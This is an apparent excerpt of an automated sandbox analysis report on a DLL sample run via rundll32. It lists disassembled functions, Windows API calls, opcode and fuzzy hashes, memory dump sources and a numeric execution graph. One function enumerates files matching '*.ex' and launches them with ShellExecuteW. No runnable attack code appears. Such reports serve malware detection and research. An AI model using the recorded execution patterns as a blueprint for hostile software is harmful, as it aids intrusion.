                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$LanguagesPreferred$Language
                    • String ID:
                    • API String ID: 2255706666-0
                    • Opcode ID: 38524cf5850665df9cf5b48bc33892d882d5a614704dc25f0594f936b4266585
                    • Instruction ID: 7d7c62a33c289d1ba87bf4073128c31a696ca7eecf281a3d819c73c10b6d41ff
                    • Opcode Fuzzy Hash: 38524cf5850665df9cf5b48bc33892d882d5a614704dc25f0594f936b4266585
                    • Instruction Fuzzy Hash: B6316D70B0011B9FDB00DFE9C988AEEB7B8FF48319F508165D521E7680DB749A09CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C901864 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetIconInfo.USER32(00000000,?), ref: 6C901885
                    • GetObjectW.GDI32(?,00000018,?), ref: 6C9018A6
                    • DeleteObject.GDI32(?), ref: 6C9018D2
                    • DeleteObject.GDI32(?), ref: 6C9018DB
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Object$Delete$IconInfo
                    • String ID:
                    • API String ID: 507670407-0
                    • Opcode ID: e1fa34d2505a0d98b0d980a1e4e05cead635c3bf329b34431a48c15138f2ab39
                    • Instruction ID: 3bd0cb8fddc7ecd3b377c6987f78018e24c17f8e04207c1ebebeb321875026a5
                    • Opcode Fuzzy Hash: e1fa34d2505a0d98b0d980a1e4e05cead635c3bf329b34431a48c15138f2ab39
                    • Instruction Fuzzy Hash: 15113A71A00208EFDB04CFA9D9948EEB7FDFB89214B2185A9EC04D7B45DB30EA049A50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E90F8 Relevance: 6.1, APIs: 4, Instructions: 57timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindNextFileW.KERNEL32(?,?), ref: 6C7E9108
                    • GetLastError.KERNEL32(?,?), ref: 6C7E9111
                    • FileTimeToLocalFileTime.KERNEL32(?), ref: 6C7E912D
                    • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 6C7E9152
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileTime$DateErrorFindLastLocalNext
                    • String ID:
                    • API String ID: 2103556486-0
                    • Opcode ID: bca9f731e73c50030d592aa4bd0febf8babf0700642abe26abbb22e1f079f7c0
                    • Instruction ID: 2e65258d0ac6d0f03ed1bdb7a68fb7340ebfd0372f519d0cdd6e0562dcea1a80
                    • Opcode Fuzzy Hash: bca9f731e73c50030d592aa4bd0febf8babf0700642abe26abbb22e1f079f7c0
                    • Instruction Fuzzy Hash: D811F1B16042019FC744DF69C9C5987B7E9BF8C304B4589AAED48CB309E735E904CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 6C7E9194: FindFirstFileW.KERNEL32(00000000,?,?,?,00000000,6C9DB693,6C9DB774,*.ex,?,00000000,6C9DB730,?,?,?,6C9DBB7C,6C9DBCE4), ref: 6C7E91AF
                    • ShellExecuteW.SHELL32(00000000,open,00000000,?,?,?), ref: 6C9DB6D1
                      • Part of subcall function 6C7E91E4: FindNextFileW.KERNEL32(?,?,00000000,6C9DB6E1,00000000,00000000,00000005,6C9DB774,*.ex,?,00000000,6C9DB730,?,?,?,6C9DBB7C), ref: 6C7E91EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileFind$ExecuteFirstNextShell
                    • String ID: *.ex$open
                    • API String ID: 3619075738-2459981157
                    • Opcode ID: e648a4529870fd94eb0fe3920fc78a62bb835052bb99f8ffb8929c261b32d8a6
                    • Instruction ID: e8ba476c024b55775cbaf51e2be40fabe4a8f846a98d5e6c58e2e50541491aab
                    • Opcode Fuzzy Hash: e648a4529870fd94eb0fe3920fc78a62bb835052bb99f8ffb8929c261b32d8a6
                    • Instruction Fuzzy Hash: 89312874A0021E9FDB50DFA0CD89BDEB7B8AB48315F6185A5E418B3B50DB30AA498B51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:9.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:1541
                    Total number of Limit Nodes:21
                    execution_graph 12757 6c9d5fdf 12758 6c9d5fe8 12757->12758 12759 6c9d600a 12757->12759 12761 6c8dfb74 94 API calls 12758->12761 12760 6c7cc6e4 16 API calls 12759->12760 12763 6c9d602b 12760->12763 12762 6c9d5ff2 12761->12762 12762->12759 12765 6c7e9010 12762->12765 12766 6c7e9041 12765->12766 12767 6c7e904e GetFileAttributesW 12766->12767 12773 6c7e9063 12766->12773 12769 6c7e9059 12767->12769 12767->12773 12768 6c7e90aa SetFileAttributesW 12770 6c7e90b4 GetLastError 12768->12770 12772 6c7e90bb 12768->12772 12774 6c7e6f8c 12769->12774 12770->12772 12773->12768 12775 6c7e6fa9 12774->12775 12776 6c7e7056 12775->12776 12777 6c7e8c60 7 API calls 12775->12777 12776->12773 12778 6c7e6fba 12777->12778 12778->12776 12779 6c7e8a14 123 API calls 12778->12779 12780 6c7e6fc9 12779->12780 12780->12776 12781 6c7e6fd8 GetFileAttributesW 12780->12781 12781->12776 12782 6c7e6fe3 12781->12782 12782->12776 12783 6c7e700a CreateFileW 12782->12783 12783->12776 12784 6c7e7019 12783->12784 12785 6c7e7033 CloseHandle 12784->12785 12785->12776 13009 6c9d6659 13010 6c9d666c 13009->13010 13011 6c7f0074 64 API calls 13010->13011 13014 6c9d668e 13010->13014 13012 6c9d6689 13011->13012 13013 6c7ca504 11 API calls 13012->13013 13013->13014 13015 6c7ce254 60 API calls 13014->13015 13016 6c9d6772 13015->13016 13017 6c9d67b3 13016->13017 13018 6c7ce254 60 API calls 13016->13018 13027 6c9d80b0 13017->13027 13018->13017 13020 6c9d67f5 13021 6c7cce8c 49 API calls 13020->13021 13024 6c9d6873 13020->13024 13021->13024 13022 6c7cc6e4 16 API calls 13023 6c9d68ae 13022->13023 13025 6c7cc6e4 16 API calls 13023->13025 13024->13022 13026 6c9d68bc 13025->13026 13029 6c9d80c3 13027->13029 13028 6c9d80eb 13031 6c7cce8c 49 API calls 13028->13031 13029->13028 13030 6c7f0074 64 API calls 13029->13030 13032 6c9d80e6 13030->13032 13033 6c9d8103 13031->13033 13034 6c7ca504 11 API calls 13032->13034 13033->13020 13034->13028 12221 6c9d5698 12222 6c7f1e34 63 API calls 12221->12222 12223 6c9d56b9 12222->12223 12224 6c9d56cd 12223->12224 12225 6c9d56ee 12223->12225 12241 6c8dfcfc 12224->12241 12227 6c8dfcfc 76 API calls 12225->12227 12230 6c9d56e1 12227->12230 12228 6c9d575a 12229 6c9d57b3 12228->12229 12236 6c9d5771 12228->12236 12276 6c8b2c8c 12228->12276 12279 6c7cce8c 12229->12279 12230->12228 12259 6c8def8c 12230->12259 12234 6c9d57d6 12235 6c7cc6e4 16 API calls 12234->12235 12235->12236 12237 6c7ccb24 16 API calls 12236->12237 12238 6c9d608b 12237->12238 12239 6c7ce378 16 API calls 12238->12239 12240 6c9d60a6 12239->12240 12240->12240 12242 6c8dfd34 12241->12242 12256 6c8dfd26 12241->12256 12243 6c8dfd96 12242->12243 12242->12256 12287 6c8e05a0 12242->12287 12295 6c8e02a4 12243->12295 12246 6c8dfda3 12246->12256 12305 6c8e0788 12246->12305 12247 6c8dfd55 12248 6c8dfd71 12247->12248 12291 6c7f07e0 12247->12291 12251 6c8e05a0 CompareStringW 12248->12251 12253 6c8dfd7a 12251->12253 12253->12243 12255 6c7f07e0 64 API calls 12253->12255 12257 6c8dfd91 12255->12257 12258 6c7ca504 11 API calls 12257->12258 12258->12243 12326 6c8e0030 12259->12326 12277 6c7f0074 64 API calls 12276->12277 12278 6c8b2ca4 12277->12278 12278->12278 12283 6c7ccea9 12279->12283 12280 6c7cceb9 12280->12234 12283->12280 12284 6c7cd2b4 49 API calls 12283->12284 12285 6c7cce8c 49 API calls 12283->12285 12351 6c7cb2f0 12283->12351 12361 6c7d136c 12283->12361 12366 6c7ce3bc 12283->12366 12284->12283 12285->12283 12288 6c8e05b0 12287->12288 12290 6c8e05c6 12288->12290 12308 6c8e0460 12288->12308 12290->12247 12292 6c7f07ec 12291->12292 12293 6c7d17ac 64 API calls 12292->12293 12294 6c7f0816 12293->12294 12296 6c8e02bc 12295->12296 12303 6c8e02f5 12295->12303 12297 6c8e02ea 12296->12297 12299 6c8e05a0 CompareStringW 12296->12299 12298 6c8e0460 CompareStringW 12297->12298 12298->12303 12300 6c8e02ce 12299->12300 12300->12297 12301 6c7f07e0 64 API calls 12300->12301 12302 6c8e02e5 12301->12302 12304 6c7ca504 11 API calls 12302->12304 12303->12246 12304->12297 12306 6c8e079c CompareStringW 12305->12306 12307 6c8e0792 12306->12307 12307->12256 12311 6c8e079c 12308->12311 12312 6c8e07a9 12311->12312 12314 6c8e046d 12311->12314 12317 6c7f72a0 12312->12317 12314->12290 12315 6c8e07b8 12315->12314 12316 6c7f72a0 CompareStringW 12315->12316 12316->12314 12318 6c7f72b5 12317->12318 12320 6c7f72b1 12317->12320 12318->12320 12321 6c7f7238 12318->12321 12320->12315 12322 6c7f724d 12321->12322 12324 6c7f7249 12321->12324 12322->12324 12325 6c7e7700 CompareStringW 12322->12325 12324->12320 12325->12324 12327 6c8e0056 12326->12327 12328 6c7f0074 64 API calls 12327->12328 12331 6c8e0073 12327->12331 12329 6c8e006e 12328->12329 12330 6c7ca504 11 API calls 12329->12330 12330->12331 12332 6c8e00a6 SetLastError 12331->12332 12334 6c7f07e0 64 API calls 12331->12334 12343 6c7e9678 12332->12343 12336 6c8e00a1 12334->12336 12335 6c8e00b6 GetLastError 12337 6c8e00e6 12335->12337 12338 6c8e00c1 12335->12338 12339 6c7ca504 11 API calls 12336->12339 12338->12337 12340 6c7ee5b8 2 API calls 12338->12340 12339->12332 12341 6c8e00d2 12340->12341 12342 6c7ca504 11 API calls 12341->12342 12342->12337 12349 6c7cbab4 12343->12349 12346 6c7e96aa 12346->12335 12347 6c7e96b9 12347->12346 12348 6c7e96ce GetFullPathNameW 12347->12348 12348->12346 12350 6c7cbab8 GetFullPathNameW 12349->12350 12350->12346 12350->12347 12352 6c7cb2f4 12351->12352 12353 6c7cb317 12351->12353 12354 6c7caed4 12352->12354 12357 6c7cb307 SysReAllocStringLen 12352->12357 12353->12283 12355 6c7caee8 12354->12355 12356 6c7caeda SysFreeString 12354->12356 12355->12283 12356->12355 12357->12353 12358 6c7cae6c 12357->12358 12359 6c7cafbc 12358->12359 12360 6c7cafa6 SysAllocStringLen 12358->12360 12359->12283 12360->12358 12360->12359 12362 6c7d1340 14 API calls 12361->12362 12363 6c7d1379 12362->12363 12370 6c7d12d8 12363->12370 12367 6c7ce3c0 12366->12367 12368 6c7ce3e9 12367->12368 12369 6c7ce378 16 API calls 12367->12369 12368->12283 12369->12368 12371 6c7d1309 12370->12371 12372 6c7d12e3 12370->12372 12371->12283 12374 6c7d0efc 12372->12374 12375 6c7d0f18 12374->12375 12376 6c7d0f20 12374->12376 12386 6c7d0d98 12375->12386 12377 6c7d0bb8 13 API calls 12376->12377 12379 6c7d0f49 12377->12379 12385 6c7d0f8e 12379->12385 12398 6c7d0cc0 12379->12398 12381 6c7d0c20 2 API calls 12383 6c7d0fb0 12381->12383 12385->12381 12387 6c7d0db1 12386->12387 12396 6c7d0e3a 12386->12396 12388 6c7d0dd8 12387->12388 12389 6c7c98e0 15 API calls 12387->12389 12390 6c7c9a54 13 API calls 12388->12390 12392 6c7d0dbf 12389->12392 12391 6c7d0de6 12390->12391 12397 6c7d0e18 12391->12397 12413 6c7d0ba4 12391->12413 12392->12388 12409 6c7c9958 12392->12409 12393 6c7c9bec 2 API calls 12393->12396 12396->12376 12397->12393 12399 6c7d0cc8 12398->12399 12400 6c7d0cd1 12399->12400 12416 6c7d079c 12399->12416 12402 6c7d0a74 12400->12402 12403 6c7d0a84 12402->12403 12404 6c7d0a8d 12403->12404 12406 6c7d0a9c 12403->12406 12421 6c7d0704 12404->12421 12407 6c7d0704 25 API calls 12406->12407 12408 6c7d0a9a 12406->12408 12407->12408 12408->12385 12410 6c7c9965 12409->12410 12411 6c7c5f88 10 API calls 12410->12411 12412 6c7c997e 12411->12412 12412->12388 12414 6c7c98e0 15 API calls 12413->12414 12415 6c7d0bac 12414->12415 12415->12391 12417 6c7c6498 10 API calls 12416->12417 12418 6c7d07a7 12417->12418 12419 6c7c98e0 15 API calls 12418->12419 12420 6c7d07ae 12419->12420 12420->12400 12422 6c7d071b 12421->12422 12423 6c7d0724 12421->12423 12424 6c7c6498 10 API calls 12422->12424 12425 6c7d073e 12423->12425 12426 6c7d0731 12423->12426 12429 6c7d0720 12424->12429 12427 6c7c5c04 10 API calls 12425->12427 12432 6c7c6180 12426->12432 12430 6c7d0743 12427->12430 12429->12408 12482 6c7d06d4 12430->12482 12433 6c7c6218 12432->12433 12434 6c7c6190 12432->12434 12435 6c7c5ab8 12433->12435 12436 6c7c6221 12433->12436 12437 6c7c619d 12434->12437 12438 6c7c61d4 12434->12438 12439 6c7c6493 12435->12439 12444 6c7c5adc VirtualQuery 12435->12444 12445 6c7c5bbb 12435->12445 12440 6c7c6239 12436->12440 12453 6c7c6348 12436->12453 12442 6c7c61a8 12437->12442 12446 6c7c5c04 10 API calls 12437->12446 12441 6c7c5c04 10 API calls 12438->12441 12439->12429 12448 6c7c625c 12440->12448 12454 6c7c6320 12440->12454 12474 6c7c6240 12440->12474 12463 6c7c61eb 12441->12463 12442->12429 12443 6c7c63ac 12447 6c7c5c04 10 API calls 12443->12447 12467 6c7c63c5 12443->12467 12456 6c7c5b15 12444->12456 12457 6c7c5b83 12444->12457 12450 6c7c5b6e 12445->12450 12452 6c7c5c04 10 API calls 12445->12452 12461 6c7c61b5 12446->12461 12470 6c7c645c 12447->12470 12460 6c7c629c Sleep 12448->12460 12448->12474 12449 6c7c6211 12449->12429 12450->12429 12451 6c7c61cd 12451->12429 12472 6c7c5bd2 12452->12472 12453->12443 12459 6c7c6384 Sleep 12453->12459 12453->12467 12458 6c7c5c04 10 API calls 12454->12458 12456->12457 12466 6c7c5b42 VirtualAlloc 12456->12466 12462 6c7c5c04 10 API calls 12457->12462 12475 6c7c6329 12458->12475 12459->12443 12464 6c7c639e Sleep 12459->12464 12465 6c7c62b4 Sleep 12460->12465 12460->12474 12461->12451 12468 6c7c5f88 10 API calls 12461->12468 12478 6c7c5b8a 12462->12478 12463->12449 12471 6c7c5f88 10 API calls 12463->12471 12464->12453 12465->12448 12466->12457 12473 6c7c5b58 VirtualAlloc 12466->12473 12467->12429 12468->12451 12469 6c7c6341 12469->12429 12470->12467 12476 6c7c5f88 10 API calls 12470->12476 12471->12449 12472->12450 12477 6c7c5f88 10 API calls 12472->12477 12473->12450 12473->12457 12474->12429 12475->12469 12479 6c7c5f88 10 API calls 12475->12479 12480 6c7c6480 12476->12480 12477->12450 12478->12450 12481 6c7c5f88 10 API calls 12478->12481 12479->12469 12480->12429 12481->12450 12483 6c7d06da 12482->12483 12484 6c7d0700 12482->12484 12483->12484 12485 6c7c5f88 10 API calls 12483->12485 12484->12429 12485->12484 13035 6c957153 13036 6c95716d 13035->13036 13037 6c7ccb24 16 API calls 13036->13037 13038 6c95717f 13037->13038 12486 6c9d599a 12487 6c9d59a7 12486->12487 12499 6c9d5ab3 12486->12499 12488 6c7ce254 60 API calls 12487->12488 12489 6c9d59c1 12488->12489 12490 6c7f0074 64 API calls 12489->12490 12493 6c9d59f9 12489->12493 12491 6c9d59f4 12490->12491 12492 6c7ca504 11 API calls 12491->12492 12492->12493 12494 6c9d5a5f 12493->12494 12495 6c8b2c8c 64 API calls 12493->12495 12496 6c7cce8c 49 API calls 12494->12496 12495->12494 12497 6c9d5a82 12496->12497 12498 6c7cc6e4 16 API calls 12497->12498 12498->12499 12906 6c9d5e1a 12907 6c9d5e23 12906->12907 12911 6c9d5e3a 12906->12911 12908 6c7f0074 64 API calls 12907->12908 12909 6c9d5e35 12908->12909 12910 6c7ca504 11 API calls 12909->12910 12910->12911 13039 6c7f06b8 13040 6c7f06c8 13039->13040 13041 6c7d17ac 64 API calls 13040->13041 13042 6c7f06f2 13041->13042 13043 6c7d0fba 13046 6c7d08d8 13043->13046 13045 6c7d0fd1 13047 6c7d083c 13 API calls 13046->13047 13048 6c7d0908 13047->13048 13049 6c7d0959 13048->13049 13050 6c7d0968 13048->13050 13055 6c7d0933 13048->13055 13051 6c7d0704 25 API calls 13049->13051 13052 6c7d0704 25 API calls 13050->13052 13053 6c7d0966 13051->13053 13052->13053 13054 6c7d0854 2 API calls 13053->13054 13054->13055 13055->13045 13056 6c7ca6b0 13057 6c7ca6c1 13056->13057 13059 6c7ca722 13056->13059 13058 6c7ca6ca UnhandledExceptionFilter 13057->13058 13060 6c7ca610 13057->13060 13058->13059 13058->13060 13060->13059 13063 6c7c722c 13060->13063 13064 6c7cacec 11 API calls 13063->13064 13065 6c7c7237 13064->13065 12912 6c9d5813 12913 6c9d5820 12912->12913 12918 6c9d58b0 12912->12918 12914 6c9d5858 12913->12914 12916 6c8b2c8c 64 API calls 12913->12916 12917 6c7cce8c 49 API calls 12914->12917 12915 6c9d5990 12919 6c881884 83 API calls 12915->12919 12916->12914 12920 6c9d587b 12917->12920 12918->12915 12921 6c9d5927 12918->12921 12923 6c8b2c8c 64 API calls 12918->12923 12926 6c9d5b88 12919->12926 12922 6c7cc6e4 16 API calls 12920->12922 12924 6c7cce8c 49 API calls 12921->12924 12922->12918 12923->12921 12925 6c9d594a 12924->12925 12927 6c7cce8c 49 API calls 12925->12927 12929 6c9d5bf9 12926->12929 12930 6c8b2c8c 64 API calls 12926->12930 12928 6c9d5961 12927->12928 12934 6c7cc6e4 16 API calls 12928->12934 12931 6c7cce8c 49 API calls 12929->12931 12930->12929 12932 6c9d5c1c 12931->12932 12933 6c7cce8c 49 API calls 12932->12933 12935 6c9d5c33 12933->12935 12934->12915 12936 6c7cc6e4 16 API calls 12935->12936 12937 6c9d5c68 12936->12937 12938 6c8f9d00 12939 6c8f9d10 12938->12939 12940 6c8f9f22 12939->12940 12955 6c901c0c 12939->12955 12968 6c8f9964 12940->12968 12956 6c901c1e 12955->12956 12957 6c901c44 EnterCriticalSection 12956->12957 12958 6c901c6c 12957->12958 12959 6c901cdc 12957->12959 12961 6c901c76 CoCreateInstance 12958->12961 12960 6c901ce9 LeaveCriticalSection 12959->12960 12961->12960 12962 6c901c95 12961->12962 12963 6c7d17ac 64 API calls 12962->12963 12964 6c901cbb 12963->12964 12965 6c7eff74 75 API calls 12964->12965 12966 6c901cd7 12965->12966 12967 6c7ca504 11 API calls 12966->12967 12967->12959 12969 6c8f9991 12968->12969 12970 6c8f99a9 GetDC 12969->12970 12971 6c8f99bb 12970->12971 12972 6c8f99c0 CreateDIBitmap 12970->12972 12977 6c8f9058 12971->12977 12982 6c8f915c 12972->12982 12975 6c8f99fd 12976 6c8f9a1b DeleteObject 12975->12976 12978 6c7d17ac 64 API calls 12977->12978 12979 6c8f9078 12978->12979 12980 6c7ca504 11 API calls 12979->12980 12981 6c8f908c 12980->12981 12983 6c8f9168 12982->12983 12984 6c8f9163 12982->12984 12983->12975 12986 6c8f90b0 GetLastError 12984->12986 12987 6c8f912e 12986->12987 12988 6c8f90db FormatMessageW 12986->12988 12989 6c8f9058 75 API calls 12987->12989 12988->12987 12991 6c8f90ff 12988->12991 12990 6c8f912c 12989->12990 12992 6c7ca504 11 API calls 12991->12992 12992->12990 13066 6c7fceb0 13067 6c7d17ac 64 API calls 13066->13067 13068 6c7fced0 13067->13068 13069 6c7ca504 11 API calls 13068->13069 13070 6c7fcee4 13069->13070 13071 6c7fa7b0 13072 6c7fa7b9 13071->13072 13072->13072 13073 6c7fa7de EnterCriticalSection 13072->13073 13074 6c7fa923 13072->13074 13075 6c7fa813 13073->13075 13076 6c7fa837 13075->13076 13077 6c7cead0 63 API calls 13075->13077 13078 6c7fa8e6 13076->13078 13079 6c7fa8c0 LoadStringW 13076->13079 13077->13076 13080 6c7fa902 LeaveCriticalSection 13078->13080 13079->13078 13080->13074 13081 6c9d604d 13082 6c9d6065 13081->13082 13083 6c7ccb24 16 API calls 13082->13083 13084 6c9d608b 13083->13084 13085 6c7ce378 16 API calls 13084->13085 13086 6c9d60a6 13085->13086 13086->13086 12500 6c7d106c 12501 6c7d1089 12500->12501 12502 6c7d1072 12500->12502 12502->12501 12504 6c7d09a4 12502->12504 12509 6c7d083c 12504->12509 12508 6c7d0a02 12508->12501 12510 6c7d0845 12509->12510 12511 6c7d0850 12509->12511 12512 6c7c9a54 13 API calls 12510->12512 12511->12508 12513 6c7d0854 12511->12513 12512->12511 12514 6c7d085d 12513->12514 12515 6c7d0865 12513->12515 12516 6c7c9bec 2 API calls 12514->12516 12515->12508 12516->12515 12786 6c9257c3 12787 6c9257cc 12786->12787 12792 6c925774 12786->12792 12789 6c7c9c34 25 API calls 12787->12789 12788 6c87a41c 75 API calls 12788->12792 12790 6c9257e6 12789->12790 12791 6c8f7da0 5 API calls 12791->12792 12792->12786 12792->12788 12792->12791 12793 6c9258f4 98 API calls 12792->12793 12795 6c8f7e00 LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 12792->12795 12793->12792 12795->12792 11193 6c7d2ae8 11194 6c7d2b13 11193->11194 11195 6c7d2b84 RaiseException 11194->11195 11204 6c7d2bac 11194->11204 11212 6c7d2c19 11195->11212 11196 6c7d2d4b 11203 6c7d2d4f GetLastError 11196->11203 11196->11212 11197 6c7d2c4c 11199 6c7d2c9b 11197->11199 11200 6c7d2c50 GetLastError 11197->11200 11198 6c7d2c41 LoadLibraryA 11198->11197 11209 6c7d2cdc FreeLibrary 11199->11209 11210 6c7d2ca9 11199->11210 11205 6c7d2c61 11200->11205 11201 6c7d2d3f GetProcAddress 11201->11196 11202 6c7d2ce2 11202->11196 11202->11201 11202->11212 11206 6c7d2d60 11203->11206 11204->11197 11204->11198 11204->11202 11204->11212 11205->11199 11208 6c7d2c73 RaiseException 11205->11208 11207 6c7d2d72 RaiseException 11206->11207 11206->11212 11207->11212 11208->11212 11209->11202 11210->11202 11211 6c7d2caf LocalAlloc 11210->11211 11211->11202 11213 6c7d2cbf 11211->11213 11213->11202 12796 6c876fd2 12797 6c876fed 12796->12797 12798 6c877090 12797->12798 12799 6c8b4788 60 API calls 12797->12799 12799->12797 11214 6c92d584 11215 6c92d5b3 11214->11215 11220 6c925744 11215->11220 11230 6c87ae78 11220->11230 11222 6c9257cc 11252 6c7c9c34 11222->11252 11227 6c925754 11227->11222 11236 6c87a41c 11227->11236 11240 6c8f7da0 EnterCriticalSection 11227->11240 11244 6c9258f4 11227->11244 11251 6c8f7e00 LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 11227->11251 11231 6c87ae89 11230->11231 11258 6c7c9cd8 11231->11258 11237 6c87a429 11236->11237 11238 6c87a438 11236->11238 11371 6c87a32c 11237->11371 11238->11227 11241 6c8f7dcd 11240->11241 11242 6c8f7dd4 LeaveCriticalSection 11240->11242 11464 6c8f7cf8 EnterCriticalSection LeaveCriticalSection EnterCriticalSection 11241->11464 11245 6c925926 11244->11245 11246 6c9258fd 11244->11246 11245->11227 11465 6c8f8dfc 11246->11465 11251->11227 11253 6c7c9c40 11252->11253 11254 6c7c9cd8 23 API calls 11253->11254 11255 6c7c9c4e 11254->11255 11488 6c7c9bec 11255->11488 11259 6c7c9d24 11258->11259 11260 6c7c9cf4 11258->11260 11265 6c7c9a54 11259->11265 11282 6c7c98e0 11260->11282 11263 6c7c9d1d 11291 6c7c5f88 11263->11291 11268 6c7c9a62 11265->11268 11267 6c7c9bdd 11267->11227 11268->11267 11269 6c7c9a8b GetTickCount 11268->11269 11271 6c7c9b34 GetTickCount 11268->11271 11355 6c7c9f14 GetCurrentThreadId 11268->11355 11277 6c7c9a9e 11269->11277 11270 6c7c9afd GetTickCount 